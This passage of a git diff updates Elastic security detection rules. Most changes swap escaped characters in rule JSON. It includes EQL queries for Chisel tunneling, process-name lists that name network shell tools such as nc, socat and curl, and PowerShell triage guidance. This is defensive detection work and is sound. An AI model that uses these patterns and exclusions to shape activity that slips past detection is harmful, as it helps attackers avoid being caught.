\"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\", \"java\", \"telnet\",\n \"ftp\", \"socat\", \"curl\", \"wget\", \"dpkg\", \"docker\", \"dockerd\", \"yum\", \"apt\", \"rpm\", \"dnf\", \"ssh\", \"sshd\", \"hugo\")]\n", + "query": "sequence by host.id, process.entity_id with maxspan=1m\n [process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \n process.args == \"server\" and process.args in (\"--port\", \"-p\", \"--reverse\", \"--backend\", \"--socks5\") and \n process.args_count >= 3 and process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")]\n [network where host.os.type == \"linux\" and event.action == \"connection_accepted\" and event.type == \"start\" and \n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" and \n not process.name : (\n \"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\", \"java\", \"telnet\",\n \"ftp\", \"socat\", \"curl\", \"wget\", \"dpkg\", \"docker\", \"dockerd\", \"yum\", \"apt\", \"rpm\", \"dnf\", \"ssh\", \"sshd\", \"hugo\")]\n", "references": [ "https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform", "https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding" @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/ac8805f6-1e08-406c-962e-3937057fa86f_3.json b/packages/security_detection_engine/kibana/security_rule/ac8805f6-1e08-406c-962e-3937057fa86f_3.json index 70325717750..d1a0ad718a4 100644 --- a/packages/security_detection_engine/kibana/security_rule/ac8805f6-1e08-406c-962e-3937057fa86f_3.json +++ b/packages/security_detection_engine/kibana/security_rule/ac8805f6-1e08-406c-962e-3937057fa86f_3.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Protocol Tunneling via Chisel Server", - "query": "sequence by host.id, process.entity_id with maxspan=1m\n [process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \n process.args == \"server\" and process.args in (\"--port\", \"-p\", \"--reverse\", \"--backend\", \"--socks5\") and \n process.args_count \u003e= 3 and process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")]\n [network where host.os.type == \"linux\" and event.action == \"connection_accepted\" and event.type == \"start\" and \n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" and \n not process.name : (\n \"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\", \"java\", \"telnet\",\n \"ftp\", \"socat\", \"curl\", \"wget\", \"dpkg\", \"docker\", \"dockerd\", \"yum\", \"apt\", \"rpm\", \"dnf\", \"ssh\", \"sshd\", \"hugo\")]\n", + "query": "sequence by host.id, process.entity_id with maxspan=1m\n [process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \n process.args == \"server\" and process.args in (\"--port\", \"-p\", \"--reverse\", \"--backend\", \"--socks5\") and \n process.args_count >= 3 and process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")]\n [network where host.os.type == \"linux\" and event.action == \"connection_accepted\" and event.type == \"start\" and \n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" and \n not process.name : (\n \"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\", \"java\", \"telnet\",\n \"ftp\", \"socat\", \"curl\", \"wget\", \"dpkg\", \"docker\", \"dockerd\", \"yum\", \"apt\", \"rpm\", \"dnf\", \"ssh\", \"sshd\", \"hugo\")]\n", "references": [ "https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform", "https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding" @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/ac96ceb8-4399-4191-af1d-4feeac1f1f46_105.json b/packages/security_detection_engine/kibana/security_rule/ac96ceb8-4399-4191-af1d-4feeac1f1f46_105.json index bbed0953553..05afa62c937 100644 --- a/packages/security_detection_engine/kibana/security_rule/ac96ceb8-4399-4191-af1d-4feeac1f1f46_105.json +++ b/packages/security_detection_engine/kibana/security_rule/ac96ceb8-4399-4191-af1d-4feeac1f1f46_105.json @@ -44,7 +44,7 @@ ], "risk_score": 73, "rule_id": "ac96ceb8-4399-4191-af1d-4feeac1f1f46", - "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "high", "tags": [ "Elastic", @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/ac96ceb8-4399-4191-af1d-4feeac1f1f46_106.json b/packages/security_detection_engine/kibana/security_rule/ac96ceb8-4399-4191-af1d-4feeac1f1f46_106.json index 5613990b2c6..399daaa0968 100644 --- a/packages/security_detection_engine/kibana/security_rule/ac96ceb8-4399-4191-af1d-4feeac1f1f46_106.json +++ b/packages/security_detection_engine/kibana/security_rule/ac96ceb8-4399-4191-af1d-4feeac1f1f46_106.json @@ -44,7 +44,7 @@ ], "risk_score": 73, "rule_id": "ac96ceb8-4399-4191-af1d-4feeac1f1f46", - "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "high", "tags": [ "Domain: Endpoint", @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/ac96ceb8-4399-4191-af1d-4feeac1f1f46_107.json b/packages/security_detection_engine/kibana/security_rule/ac96ceb8-4399-4191-af1d-4feeac1f1f46_107.json index 317d5dcd45d..619abc7340a 100644 --- a/packages/security_detection_engine/kibana/security_rule/ac96ceb8-4399-4191-af1d-4feeac1f1f46_107.json +++ b/packages/security_detection_engine/kibana/security_rule/ac96ceb8-4399-4191-af1d-4feeac1f1f46_107.json @@ -44,7 +44,7 @@ ], "risk_score": 73, "rule_id": "ac96ceb8-4399-4191-af1d-4feeac1f1f46", - "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/acbc8bb9-2486-49a8-8779-45fb5f9a93ee_203.json b/packages/security_detection_engine/kibana/security_rule/acbc8bb9-2486-49a8-8779-45fb5f9a93ee_203.json index 6c75dc13bbd..450e05ca8e4 100644 --- a/packages/security_detection_engine/kibana/security_rule/acbc8bb9-2486-49a8-8779-45fb5f9a93ee_203.json +++ b/packages/security_detection_engine/kibana/security_rule/acbc8bb9-2486-49a8-8779-45fb5f9a93ee_203.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/acbc8bb9-2486-49a8-8779-45fb5f9a93ee_204.json b/packages/security_detection_engine/kibana/security_rule/acbc8bb9-2486-49a8-8779-45fb5f9a93ee_204.json index ba78ac1be43..90197b6fae9 100644 --- a/packages/security_detection_engine/kibana/security_rule/acbc8bb9-2486-49a8-8779-45fb5f9a93ee_204.json +++ b/packages/security_detection_engine/kibana/security_rule/acbc8bb9-2486-49a8-8779-45fb5f9a93ee_204.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/acbc8bb9-2486-49a8-8779-45fb5f9a93ee_205.json b/packages/security_detection_engine/kibana/security_rule/acbc8bb9-2486-49a8-8779-45fb5f9a93ee_205.json index 562cb587b28..ae9124f8848 100644 --- a/packages/security_detection_engine/kibana/security_rule/acbc8bb9-2486-49a8-8779-45fb5f9a93ee_205.json +++ b/packages/security_detection_engine/kibana/security_rule/acbc8bb9-2486-49a8-8779-45fb5f9a93ee_205.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/acd611f3-2b93-47b3-a0a3-7723bcc46f6d_102.json b/packages/security_detection_engine/kibana/security_rule/acd611f3-2b93-47b3-a0a3-7723bcc46f6d_102.json index a987830d6be..68435e15de9 100644 --- a/packages/security_detection_engine/kibana/security_rule/acd611f3-2b93-47b3-a0a3-7723bcc46f6d_102.json +++ b/packages/security_detection_engine/kibana/security_rule/acd611f3-2b93-47b3-a0a3-7723bcc46f6d_102.json @@ -91,7 +91,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -106,7 +106,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/acd611f3-2b93-47b3-a0a3-7723bcc46f6d_103.json b/packages/security_detection_engine/kibana/security_rule/acd611f3-2b93-47b3-a0a3-7723bcc46f6d_103.json index 82f5c5f595f..b86332c89ce 100644 --- a/packages/security_detection_engine/kibana/security_rule/acd611f3-2b93-47b3-a0a3-7723bcc46f6d_103.json +++ b/packages/security_detection_engine/kibana/security_rule/acd611f3-2b93-47b3-a0a3-7723bcc46f6d_103.json @@ -90,7 +90,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -105,7 +105,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/acd611f3-2b93-47b3-a0a3-7723bcc46f6d_104.json b/packages/security_detection_engine/kibana/security_rule/acd611f3-2b93-47b3-a0a3-7723bcc46f6d_104.json index e0474ca70e8..1f55fadbebc 100644 --- a/packages/security_detection_engine/kibana/security_rule/acd611f3-2b93-47b3-a0a3-7723bcc46f6d_104.json +++ b/packages/security_detection_engine/kibana/security_rule/acd611f3-2b93-47b3-a0a3-7723bcc46f6d_104.json @@ -91,7 +91,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -106,7 +106,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/ace1e989-a541-44df-93a8-a8b0591b63c0_103.json b/packages/security_detection_engine/kibana/security_rule/ace1e989-a541-44df-93a8-a8b0591b63c0_103.json index d8ec95d6582..045088879e0 100644 --- a/packages/security_detection_engine/kibana/security_rule/ace1e989-a541-44df-93a8-a8b0591b63c0_103.json +++ b/packages/security_detection_engine/kibana/security_rule/ace1e989-a541-44df-93a8-a8b0591b63c0_103.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/ace1e989-a541-44df-93a8-a8b0591b63c0_104.json b/packages/security_detection_engine/kibana/security_rule/ace1e989-a541-44df-93a8-a8b0591b63c0_104.json index c98c0cc4184..00a2eac8354 100644 --- a/packages/security_detection_engine/kibana/security_rule/ace1e989-a541-44df-93a8-a8b0591b63c0_104.json +++ b/packages/security_detection_engine/kibana/security_rule/ace1e989-a541-44df-93a8-a8b0591b63c0_104.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/ace1e989-a541-44df-93a8-a8b0591b63c0_105.json b/packages/security_detection_engine/kibana/security_rule/ace1e989-a541-44df-93a8-a8b0591b63c0_105.json index 0650e445853..93074c8b406 100644 --- a/packages/security_detection_engine/kibana/security_rule/ace1e989-a541-44df-93a8-a8b0591b63c0_105.json +++ b/packages/security_detection_engine/kibana/security_rule/ace1e989-a541-44df-93a8-a8b0591b63c0_105.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/ace1e989-a541-44df-93a8-a8b0591b63c0_106.json b/packages/security_detection_engine/kibana/security_rule/ace1e989-a541-44df-93a8-a8b0591b63c0_106.json index 41d2abd769e..4c9a9a974e8 100644 --- a/packages/security_detection_engine/kibana/security_rule/ace1e989-a541-44df-93a8-a8b0591b63c0_106.json +++ b/packages/security_detection_engine/kibana/security_rule/ace1e989-a541-44df-93a8-a8b0591b63c0_106.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/acf738b5-b5b2-4acc-bad9-1e18ee234f40_102.json b/packages/security_detection_engine/kibana/security_rule/acf738b5-b5b2-4acc-bad9-1e18ee234f40_102.json index a84a96de617..c5aa17eb5fa 100644 --- a/packages/security_detection_engine/kibana/security_rule/acf738b5-b5b2-4acc-bad9-1e18ee234f40_102.json +++ b/packages/security_detection_engine/kibana/security_rule/acf738b5-b5b2-4acc-bad9-1e18ee234f40_102.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/acf738b5-b5b2-4acc-bad9-1e18ee234f40_103.json b/packages/security_detection_engine/kibana/security_rule/acf738b5-b5b2-4acc-bad9-1e18ee234f40_103.json index 89029cb29e6..89cad0b13e8 100644 --- a/packages/security_detection_engine/kibana/security_rule/acf738b5-b5b2-4acc-bad9-1e18ee234f40_103.json +++ b/packages/security_detection_engine/kibana/security_rule/acf738b5-b5b2-4acc-bad9-1e18ee234f40_103.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/acf738b5-b5b2-4acc-bad9-1e18ee234f40_104.json b/packages/security_detection_engine/kibana/security_rule/acf738b5-b5b2-4acc-bad9-1e18ee234f40_104.json index bb5fa9da0e7..b86c01e4cdd 100644 --- a/packages/security_detection_engine/kibana/security_rule/acf738b5-b5b2-4acc-bad9-1e18ee234f40_104.json +++ b/packages/security_detection_engine/kibana/security_rule/acf738b5-b5b2-4acc-bad9-1e18ee234f40_104.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/acf738b5-b5b2-4acc-bad9-1e18ee234f40_105.json b/packages/security_detection_engine/kibana/security_rule/acf738b5-b5b2-4acc-bad9-1e18ee234f40_105.json index 50106ac9afa..1a3beaab216 100644 --- a/packages/security_detection_engine/kibana/security_rule/acf738b5-b5b2-4acc-bad9-1e18ee234f40_105.json +++ b/packages/security_detection_engine/kibana/security_rule/acf738b5-b5b2-4acc-bad9-1e18ee234f40_105.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/acf738b5-b5b2-4acc-bad9-1e18ee234f40_106.json b/packages/security_detection_engine/kibana/security_rule/acf738b5-b5b2-4acc-bad9-1e18ee234f40_106.json index f0eebc7dd4b..4896ae7b497 100644 --- a/packages/security_detection_engine/kibana/security_rule/acf738b5-b5b2-4acc-bad9-1e18ee234f40_106.json +++ b/packages/security_detection_engine/kibana/security_rule/acf738b5-b5b2-4acc-bad9-1e18ee234f40_106.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ad0d2742-9a49-11ec-8d6b-acde48001122_104.json b/packages/security_detection_engine/kibana/security_rule/ad0d2742-9a49-11ec-8d6b-acde48001122_104.json index fefe639a3af..b70df15b0f8 100644 --- a/packages/security_detection_engine/kibana/security_rule/ad0d2742-9a49-11ec-8d6b-acde48001122_104.json +++ b/packages/security_detection_engine/kibana/security_rule/ad0d2742-9a49-11ec-8d6b-acde48001122_104.json @@ -56,7 +56,7 @@ ], "risk_score": 47, "rule_id": "ad0d2742-9a49-11ec-8d6b-acde48001122", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ad0d2742-9a49-11ec-8d6b-acde48001122_105.json b/packages/security_detection_engine/kibana/security_rule/ad0d2742-9a49-11ec-8d6b-acde48001122_105.json index 40dc7338a3d..5253b887902 100644 --- a/packages/security_detection_engine/kibana/security_rule/ad0d2742-9a49-11ec-8d6b-acde48001122_105.json +++ b/packages/security_detection_engine/kibana/security_rule/ad0d2742-9a49-11ec-8d6b-acde48001122_105.json @@ -56,7 +56,7 @@ ], "risk_score": 47, "rule_id": "ad0d2742-9a49-11ec-8d6b-acde48001122", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ad0d2742-9a49-11ec-8d6b-acde48001122_106.json b/packages/security_detection_engine/kibana/security_rule/ad0d2742-9a49-11ec-8d6b-acde48001122_106.json index bf47b5a249c..3fda998c367 100644 --- a/packages/security_detection_engine/kibana/security_rule/ad0d2742-9a49-11ec-8d6b-acde48001122_106.json +++ b/packages/security_detection_engine/kibana/security_rule/ad0d2742-9a49-11ec-8d6b-acde48001122_106.json @@ -56,7 +56,7 @@ ], "risk_score": 47, "rule_id": "ad0d2742-9a49-11ec-8d6b-acde48001122", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ad3f2807-2b3e-47d7-b282-f84acbbe14be_203.json b/packages/security_detection_engine/kibana/security_rule/ad3f2807-2b3e-47d7-b282-f84acbbe14be_203.json index 9fe6dd74083..7d6b3355859 100644 --- a/packages/security_detection_engine/kibana/security_rule/ad3f2807-2b3e-47d7-b282-f84acbbe14be_203.json +++ b/packages/security_detection_engine/kibana/security_rule/ad3f2807-2b3e-47d7-b282-f84acbbe14be_203.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/ad3f2807-2b3e-47d7-b282-f84acbbe14be_204.json b/packages/security_detection_engine/kibana/security_rule/ad3f2807-2b3e-47d7-b282-f84acbbe14be_204.json index a5483aea451..ac990e3778b 100644 --- a/packages/security_detection_engine/kibana/security_rule/ad3f2807-2b3e-47d7-b282-f84acbbe14be_204.json +++ b/packages/security_detection_engine/kibana/security_rule/ad3f2807-2b3e-47d7-b282-f84acbbe14be_204.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/ad3f2807-2b3e-47d7-b282-f84acbbe14be_205.json b/packages/security_detection_engine/kibana/security_rule/ad3f2807-2b3e-47d7-b282-f84acbbe14be_205.json index ead1aa1021e..73472a68924 100644 --- a/packages/security_detection_engine/kibana/security_rule/ad3f2807-2b3e-47d7-b282-f84acbbe14be_205.json +++ b/packages/security_detection_engine/kibana/security_rule/ad3f2807-2b3e-47d7-b282-f84acbbe14be_205.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/ad84d445-b1ce-4377-82d9-7c633f28bf9a_105.json b/packages/security_detection_engine/kibana/security_rule/ad84d445-b1ce-4377-82d9-7c633f28bf9a_105.json index 5d1daf55eb9..34385726627 100644 --- a/packages/security_detection_engine/kibana/security_rule/ad84d445-b1ce-4377-82d9-7c633f28bf9a_105.json +++ b/packages/security_detection_engine/kibana/security_rule/ad84d445-b1ce-4377-82d9-7c633f28bf9a_105.json @@ -12,7 +12,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Suspicious Portable Executable Encoded in Powershell Script", - "note": "## Triage and analysis\n\n### Investigating Suspicious Portable Executable Encoded in Powershell Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can abuse PowerShell in-memory capabilities to inject executables into memory without touching the disk, bypassing file-based security protections. These executables are generally base64 encoded.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to 